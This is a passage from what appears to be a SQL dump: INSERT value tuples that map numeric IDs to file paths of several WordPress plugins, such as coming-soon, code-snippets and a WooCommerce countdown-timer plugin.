de-snippets/php/views/edit.php'),(2100,'wp-content/plugins/code-snippets/php/views/import.php'),(2101,'wp-content/plugins/code-snippets/php/views/manage.php'),(2102,'wp-content/plugins/code-snippets/readme.txt'),(2103,'wp-content/plugins/code-snippets/uninstall.php'),(2104,'wp-content/plugins/coming-soon/LICENSE.txt'),(2105,'wp-content/plugins/coming-soon/README.txt'),(2106,'wp-content/plugins/coming-soon/coming-soon.php'),(2107,'wp-content/plugins/coming-soon/framework/coming-soon-pro-sidebar.png'),(2108,'wp-content/plugins/coming-soon/framework/field-types/checkbox.php'),(2109,'wp-content/plugins/coming-soon/framework/field-types/color.php'),(2110,'wp-content/plugins/coming-soon/framework/field-types/date.php'),(2111,'wp-content/plugins/coming-soon/framework/field-types/daterange.php'),(2112,'wp-content/plugins/coming-soon/framework/field-types/export.php'),(2113,'wp-content/plugins/coming-soon/framework/field-types/import.php'),(2114,'wp-content/plugins/coming-soon/framework/field-types/js/color.js'),(2115,'wp-content/plugins/coming-soon/framework/field-types/js/upload.js'),(2116,'wp-content/plugins/coming-soon/framework/field-types/multiselect.php'),(2117,'wp-content/plugins/coming-soon/framework/field-types/password.php'),(2118,'wp-content/plugins/coming-soon/framework/field-types/radio.php'),(2119,'wp-content/plugins/coming-soon/framework/field-types/select.php'),(2120,'wp-content/plugins/coming-soon/framework/field-types/text.php'),(2121,'wp-content/plugins/coming-soon/framework/field-types/textarea.php'),(2122,'wp-content/plugins/coming-soon/framework/field-types/textbox.php'),(2123,'wp-content/plugins/coming-soon/framework/field-types/themes.php'),(2124,'wp-content/plugins/coming-soon/framework/field-types/upload.php'),(2125,'wp-content/plugins/coming-soon/framework/field-types/wpeditor.php'),(2126,'wp-content/plugins/coming-soon/framework/framework.php'),(2127,'wp-content/plugins/coming-soon/framework/get-settings.php'),(2128,'wp-content/plugins/coming-soon/framework/getting-started-banner.png'),(2129,'wp-content/plugins/coming-soon/framework/review.php'),(2130,'wp-content/plugins/coming-soon/framework/settings-scripts.js'),(2131,'wp-content/plugins/coming-soon/framework/settings-style.css'),(2132,'wp-content/plugins/coming-soon/framework/skin.php'),(2133,'wp-content/plugins/coming-soon/framework/validations/color.php'),(2134,'wp-content/plugins/coming-soon/framework/validations/email.php'),(2135,'wp-content/plugins/coming-soon/framework/validations/escurlraw.php'),(2136,'wp-content/plugins/coming-soon/framework/validations/number.php'),(2137,'wp-content/plugins/coming-soon/framework/validations/required.php'),(2138,'wp-content/plugins/coming-soon/inc/adminbar-style.css'),(2139,'wp-content/plugins/coming-soon/inc/class-seed-csp4.php'),(2140,'wp-content/plugins/coming-soon/inc/config-settings.php'),(2141,'wp-content/plugins/coming-soon/inc/default-settings.php'),(2142,'wp-content/plugins/coming-soon/languages/coming-soon-da_DK.mo'),(2143,'wp-content/plugins/coming-soon/languages/coming-soon-da_DK.po'),(2144,'wp-content/plugins/coming-soon/languages/coming-soon-pt_BR.mo'),(2145,'wp-content/plugins/coming-soon/languages/coming-soon-pt_BR.po'),(2146,'wp-content/plugins/coming-soon/languages/coming-soon-sv_SE.mo'),(2147,'wp-content/plugins/coming-soon/languages/coming-soon-sv_SE.po'),(2148,'wp-content/plugins/coming-soon/languages/coming-soon.pot'),(2149,'wp-content/plugins/coming-soon/lib/seed_csp4_lessc.inc.php'),(2150,'wp-content/plugins/coming-soon/public/images/avatar.jpg'),(2151,'wp-content/plugins/coming-soon/public/images/home-video-teaser.png'),(2152,'wp-content/plugins/coming-soon/public/images/johnturnerpic-300x300.jpg'),(2153,'wp-content/plugins/coming-soon/public/images/jt-compressor.png'),(2154,'wp-content/plugins/coming-soon/public/images/menu-logo.png'),(2155,'wp-content/plugins/coming-soon/public/images/rafflepress-logo.png'),(2156,'wp-content/plugins/coming-soon/public/images/seedprod-logo.png'),(2157,'wp-content/plugins/coming-soon/public/images/themes/1.jpg'),(2158,'wp-content/plugins/coming-soon/public/images/themes/10.jpg'),(2159,'wp-content/plugins/coming-soon/public/images/themes/11.jpg'),(2160,'wp-content/plugins/coming-soon/public/images/themes/12.jpg'),(2161,'wp-content/plugins/coming-soon/public/images/themes/13.jpg'),(2162,'wp-content/plugins/coming-soon/public/images/themes/14.jpg'),(2163,'wp-content/plugins/coming-soon/public/images/themes/15.jpg'),(2164,'wp-content/plugins/coming-soon/public/images/themes/16.jpg'),(2165,'wp-content/plugins/coming-soon/public/images/themes/18.jpg'),(2166,'wp-content/plugins/coming-soon/public/images/themes/19.jpg'),(2167,'wp-content/plugins/coming-soon/public/images/themes/2.jpg'),(2168,'wp-content/plugins/coming-soon/public/images/themes/20.jpg'),(2169,'wp-content/plugins/coming-soon/public/images/themes/21.jpg'),(2170,'wp-content/plugins/coming-soon/public/images/themes/22.jpg'),(2171,'wp-content/plugins/coming-soon/public/images/themes/23.jpg'),(2172,'wp-content/plugins/coming-soon/public/images/themes/24.jpg'),(2173,'wp-content/plugins/coming-soon/public/images/themes/25.jpg'),(2174,'wp-content/plugins/coming-soon/public/images/themes/26.jpg'),(2175,'wp-content/plugins/coming-soon/public/images/themes/27.jpg'),(2176,'wp-content/plugins/coming-soon/public/images/themes/28.jpg'),(2177,'wp-content/plugins/coming-soon/public/images/themes/29.jpg'),(2178,'wp-content/plugins/coming-soon/public/images/themes/3.jpg'),(2179,'wp-content/plugins/coming-soon/public/images/themes/30.jpg'),(2180,'wp-content/plugins/coming-soon/public/images/themes/31.jpg'),(2181,'wp-content/plugins/coming-soon/public/images/themes/32.jpg'),(2182,'wp-content/plugins/coming-soon/public/images/themes/33.jpg'),(2183,'wp-content/plugins/coming-soon/public/images/themes/34.jpg'),(2184,'wp-content/plugins/coming-soon/public/images/themes/35.jpg'),(2185,'wp-content/plugins/coming-soon/public/images/themes/36.jpg'),(2186,'wp-content/plugins/coming-soon/public/images/themes/37.jpg'),(2187,'wp-content/plugins/coming-soon/public/images/themes/38.jpg'),(2188,'wp-content/plugins/coming-soon/public/images/themes/39.jpg'),(2189,'wp-content/plugins/coming-soon/public/images/themes/40.jpg'),(2190,'wp-content/plugins/coming-soon/public/images/themes/41.jpg'),(2191,'wp-content/plugins/coming-soon/public/images/themes/42.jpg'),(2192,'wp-content/plugins/coming-soon/public/images/themes/43.jpg'),(2193,'wp-content/plugins/coming-soon/public/images/themes/44.jpg'),(2194,'wp-content/plugins/coming-soon/public/images/themes/45.jpg'),(2195,'wp-content/plugins/coming-soon/public/images/themes/46.jpg'),(2196,'wp-content/plugins/coming-soon/public/images/themes/47.jpg'),(2197,'wp-content/plugins/coming-soon/public/images/themes/48.jpg'),(2198,'wp-content/plugins/coming-soon/public/images/themes/49.jpg'),(2199,'wp-content/plugins/coming-soon/public/images/themes/5.jpg'),(2200,'wp-content/plugins/coming-soon/public/images/themes/51.jpg'),(2201,'wp-content/plugins/coming-soon/public/images/themes/52.jpg'),(2202,'wp-content/plugins/coming-soon/public/images/themes/53.jpg'),(2203,'wp-content/plugins/coming-soon/public/images/themes/54.jpg'),(2204,'wp-content/plugins/coming-soon/public/images/themes/55.jpg'),(2205,'wp-content/plugins/coming-soon/public/images/themes/56.jpg'),(2206,'wp-content/plugins/coming-soon/public/images/themes/57.jpg'),(2207,'wp-content/plugins/coming-soon/public/images/themes/58.jpg'),(2208,'wp-content/plugins/coming-soon/public/images/themes/59.jpg'),(2209,'wp-content/plugins/coming-soon/public/images/themes/6.jpg'),(2210,'wp-content/plugins/coming-soon/public/images/themes/60.jpg'),(2211,'wp-content/plugins/coming-soon/public/images/themes/61.jpg'),(2212,'wp-content/plugins/coming-soon/public/images/themes/62.jpg'),(2213,'wp-content/plugins/coming-soon/public/images/themes/7.jpg'),(2214,'wp-content/plugins/coming-soon/public/images/themes/8.jpg'),(2215,'wp-content/plugins/coming-soon/public/images/themes/9.jpg'),(2216,'wp-content/plugins/coming-soon/public/vendor/fontawesome/css/fontawesome.min.css'),(2217,'wp-content/plugins/coming-soon/public/vendor/fontawesome/css/solid.min.css'),(2218,'wp-content/plugins/coming-soon/public/vendor/fontawesome/webfonts/fa-solid-900.eot'),(2219,'wp-content/plugins/coming-soon/public/vendor/fontawesome/webfonts/fa-solid-900.svg'),(2220,'wp-content/plugins/coming-soon/public/vendor/fontawesome/webfonts/fa-solid-900.ttf'),(2221,'wp-content/plugins/coming-soon/public/vendor/fontawesome/webfonts/fa-solid-900.woff'),(2222,'wp-content/plugins/coming-soon/public/vendor/fontawesome/webfonts/fa-solid-900.woff2'),(2223,'wp-content/plugins/coming-soon/public/vendor/magnific-popup/jquery.magnific-popup.min.js'),(2224,'wp-content/plugins/coming-soon/public/vendor/magnific-popup/magnific-popup.css'),(2225,'wp-content/plugins/coming-soon/public/vendor/tingle/tingle.css'),(2226,'wp-content/plugins/coming-soon/public/vendor/tingle/tingle.js'),(2227,'wp-content/plugins/coming-soon/public/vendor/tingle/tingle.min.css'),(2228,'wp-content/plugins/coming-soon/public/vendor/tingle/tingle.min.js'),(2229,'wp-content/plugins/coming-soon/resources/views/addons.php'),(2230,'wp-content/plugins/coming-soon/resources/views/exit-pop.php'),(2231,'wp-content/plugins/coming-soon/resources/views/giveaways.php'),(2232,'wp-content/plugins/coming-soon/resources/views/header.php'),(2233,'wp-content/plugins/coming-soon/resources/views/stockimages.php'),(2234,'wp-content/plugins/coming-soon/resources/views/subscribers.php'),(2235,'wp-content/plugins/coming-soon/resources/views/themes.php'),(2236,'wp-content/plugins/coming-soon/themes/default/bootstrap/css/bootstrap.min.css'),(2237,'wp-content/plugins/coming-soon/themes/default/bootstrap/js/bootstrap.min.js'),(2238,'wp-content/plugins/coming-soon/themes/default/functions.php'),(2239,'wp-content/plugins/coming-soon/themes/default/images/seedprod-credit.png'),(2240,'wp-content/plugins/coming-soon/themes/default/index.php'),(2241,'wp-content/plugins/coming-soon/themes/default/rtl.css'),(2242,'wp-content/plugins/coming-soon/themes/default/style.css'),(2243,'wp-content/plugins/coming-soon/themes/index.php'),(2244,'wp-content/plugins/es-woocommerce-activecampaign/class-es-wc-integration-activecampaign.php'),(2245,'wp-content/plugins/es-woocommerce-activecampaign/es-woocommerce-activecampaign.php'),(2246,'wp-content/plugins/es-woocommerce-activecampaign/includes/Account.class.php'),(2247,'wp-content/plugins/es-woocommerce-activecampaign/includes/ActiveCampaign.class.php'),(2248,'wp-content/plugins/es-woocommerce-activecampaign/includes/Auth.class.php'),(2249,'wp-content/plugins/es-woocommerce-activecampaign/includes/Automation.class.php'),(2250,'wp-content/plugins/es-woocommerce-activecampaign/includes/Campaign.class.php'),(2251,'wp-content/plugins/es-woocommerce-activecampaign/includes/Connector.class.php'),(2252,'wp-content/plugins/es-woocommerce-activecampaign/includes/Connector.class.php.v01-curl.php'),(2253,'wp-content/plugins/es-woocommerce-activecampaign/includes/Contact.class.php'),(2254,'wp-content/plugins/es-woocommerce-activecampaign/includes/Deal.class.php'),(2255,'wp-content/plugins/es-woocommerce-activecampaign/includes/Design.class.php'),(2256,'wp-content/plugins/es-woocommerce-activecampaign/includes/Form.class.php'),(2257,'wp-content/plugins/es-woocommerce-activecampaign/includes/Group.class.php'),(2258,'wp-content/plugins/es-woocommerce-activecampaign/includes/List.class.php'),(2259,'wp-content/plugins/es-woocommerce-activecampaign/includes/Message.class.php'),(2260,'wp-content/plugins/es-woocommerce-activecampaign/includes/Segment.class.php'),(2261,'wp-content/plugins/es-woocommerce-activecampaign/includes/Settings.class.php'),(2262,'wp-content/plugins/es-woocommerce-activecampaign/includes/Subscriber.class.php'),(2263,'wp-content/plugins/es-woocommerce-activecampaign/includes/Tag.class.php'),(2264,'wp-content/plugins/es-woocommerce-activecampaign/includes/Tracking.class.php'),(2265,'wp-content/plugins/es-woocommerce-activecampaign/includes/User.class.php'),(2266,'wp-content/plugins/es-woocommerce-activecampaign/includes/Webhook.class.php'),(2267,'wp-content/plugins/es-woocommerce-activecampaign/includes/config.php'),(2268,'wp-content/plugins/es-woocommerce-activecampaign/includes/exceptions/RequestException.php'),(2269,'wp-content/plugins/es-woocommerce-activecampaign/readme.txt'),(2270,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/css/chosen.css'),(2271,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/css/index.php'),(2272,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/css/jquery-confirm.min.css'),(2273,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/css/wcct-admin-all.css'),(2274,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/css/wcct-admin-app.css'),(2275,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/css/wcct-admin-style.css'),(2276,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/css/wcct-modal.css'),(2277,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/css/wcct-xl-notice.css'),(2278,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/fonts/flicon.css'),(2279,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/fonts/flicon.eot'),(2280,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/fonts/flicon.svg'),(2281,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/fonts/flicon.ttf'),(2282,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/fonts/flicon.woff'),(2283,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/fonts/index.php'),(2284,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/fonts/xlcore.eot'),(2285,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/fonts/xlcore.svg'),(2286,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/fonts/xlcore.ttf'),(2287,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/fonts/xlcore.woff'),(2288,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/black-friday.jpg'),(2289,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/chosen-sprite.png'),(2290,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/christmas.jpg'),(2291,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/easter.png'),(2292,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/finale.png'),(2293,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/halloween.jpg'),(2294,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/index.php'),(2295,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/modules/actions.jpg'),(2296,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/modules/advanced.png'),(2297,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/modules/coupons.gif'),(2298,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/modules/custom_css.png'),(2299,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/modules/custom_text.png'),(2300,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/modules/events.gif'),(2301,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/modules/evergreen.png'),(2302,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/modules/index.php'),(2303,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/modules/inventory-advanced.png'),(2304,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/modules/inventory-range.png'),(2305,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/modules/recurring.gif'),(2306,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/modules/sticky_footer.gif'),(2307,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/modules/sticky_header.gif'),(2308,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/nextmove.png'),(2309,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/sales-trigger.png'),(2310,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/special-offers.png'),(2311,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/spinner.gif'),(2312,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/wc.png'),(2313,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/img/xlplugins.png'),(2314,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/index.php'),(2315,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/js/chosen/ajax-chosen.jquery.min.js'),(2316,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/js/chosen/chosen-rtl.js'),(2317,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/js/chosen/chosen-rtl.min.js'),(2318,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/js/chosen/chosen.jquery.min.js'),(2319,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/js/chosen/index.php'),(2320,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/js/index.php'),(2321,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/js/jquery-confirm.min.js'),(2322,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/js/wcct-admin-app.js'),(2323,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/js/wcct-admin-app.min.js'),(2324,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/js/wcct-admin.js'),(2325,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/js/wcct-admin.min.js'),(2326,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/js/wcct-modal.js'),(2327,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/assets/js/wcct-modal.min.js'),(2328,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/bootstrap.php'),(2329,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/css/cmb2-display-rtl.css'),(2330,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/css/cmb2-display-rtl.min.css'),(2331,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/css/cmb2-display.css'),(2332,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/css/cmb2-display.css.map'),(2333,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/css/cmb2-display.min.css'),(2334,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/css/cmb2-front-rtl.css'),(2335,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/css/cmb2-front-rtl.min.css'),(2336,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/css/cmb2-front.css'),(2337,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/css/cmb2-front.min.css'),(2338,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/css/cmb2-rtl.css'),(2339,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/css/cmb2-rtl.min.css'),(2340,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/css/cmb2.css'),(2341,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/css/cmb2.min.css'),(2342,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/css/index.php'),(2343,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/images/ico-delete.png'),(2344,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/images/index.php'),(2345,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/images/ui-bg_flat_0_aaaaaa_40x100.png'),(2346,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/images/ui-bg_flat_75_ffffff_40x100.png'),(2347,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/images/ui-bg_glass_55_fbf9ee_1x400.png'),(2348,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/images/ui-bg_glass_65_ffffff_1x400.png'),(2349,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/images/ui-bg_glass_75_dadada_1x400.png'),(2350,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/images/ui-bg_glass_75_e6e6e6_1x400.png'),(2351,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/images/ui-bg_glass_95_fef1ec_1x400.png'),(2352,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/images/ui-bg_highlight-soft_75_cccccc_1x100.png'),(2353,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/images/ui-icons_222222_256x240.png'),(2354,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/images/ui-icons_2e83ff_256x240.png'),(2355,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/images/ui-icons_454545_256x240.png'),(2356,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/images/ui-icons_888888_256x240.png'),(2357,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/images/ui-icons_cd0a0a_256x240.png'),(2358,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/CMB2.php'),(2359,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/CMB2_Ajax.php'),(2360,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/CMB2_Base.php'),(2361,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/CMB2_Boxes.php'),(2362,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/CMB2_Field.php'),(2363,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/CMB2_Field_Display.php'),(2364,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/CMB2_Hookup_Base.php'),(2365,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/CMB2_JS.php'),(2366,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/CMB2_Options.php'),(2367,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/CMB2_Options_Hookup.php'),(2368,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/CMB2_Sanitize.php'),(2369,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/CMB2_Show_Filters.php'),(2370,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/CMB2_Types.php'),(2371,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/CMB2_Utils.php'),(2372,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/CMB2_hookup.php'),(2373,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/helper-functions.php'),(2374,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/index.php'),(2375,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/rest-api/CMB2_REST.php'),(2376,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/rest-api/CMB2_REST_Controller.php'),(2377,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/rest-api/CMB2_REST_Controller_Boxes.php'),(2378,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/rest-api/CMB2_REST_Controller_Fields.php'),(2379,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/shim/WP_REST_Controller.php'),(2380,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Base.php'),(2381,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Checkbox.php'),(2382,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Colorpicker.php'),(2383,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_File.php'),(2384,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_File_Base.php'),(2385,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_File_List.php'),(2386,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Multi_Base.php'),(2387,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Multicheck.php'),(2388,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Oembed.php'),(2389,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Picker_Base.php'),(2390,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Radio.php'),(2391,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Select.php'),(2392,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Select_Timezone.php'),(2393,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Taxonomy_Base.php'),(2394,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Taxonomy_Multicheck.php'),(2395,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Taxonomy_Multicheck_Hierarchical.php'),(2396,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Taxonomy_Radio.php'),(2397,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Taxonomy_Radio_Hierarchical.php'),(2398,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Taxonomy_Select.php'),(2399,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Text.php'),(2400,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Text_Date.php'),(2401,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Text_Datetime_Timestamp.php'),(2402,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Text_Datetime_Timestamp_Timezone.php'),(2403,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Text_Time.php'),(2404,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Textarea.php'),(2405,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Textarea_Code.php'),(2406,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Title.php'),(2407,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Wysiwyg.php'),(2408,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/index.php'),(2409,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/init.php'),(2410,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/js/cmb2-wysiwyg.js'),(2411,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/js/cmb2.js'),(2412,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/js/cmb2.min.js'),(2413,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/js/index.php'),(2414,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/js/jquery-ui-timepicker-addon.min.js'),(2415,'wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/js/wp-color-picker-alph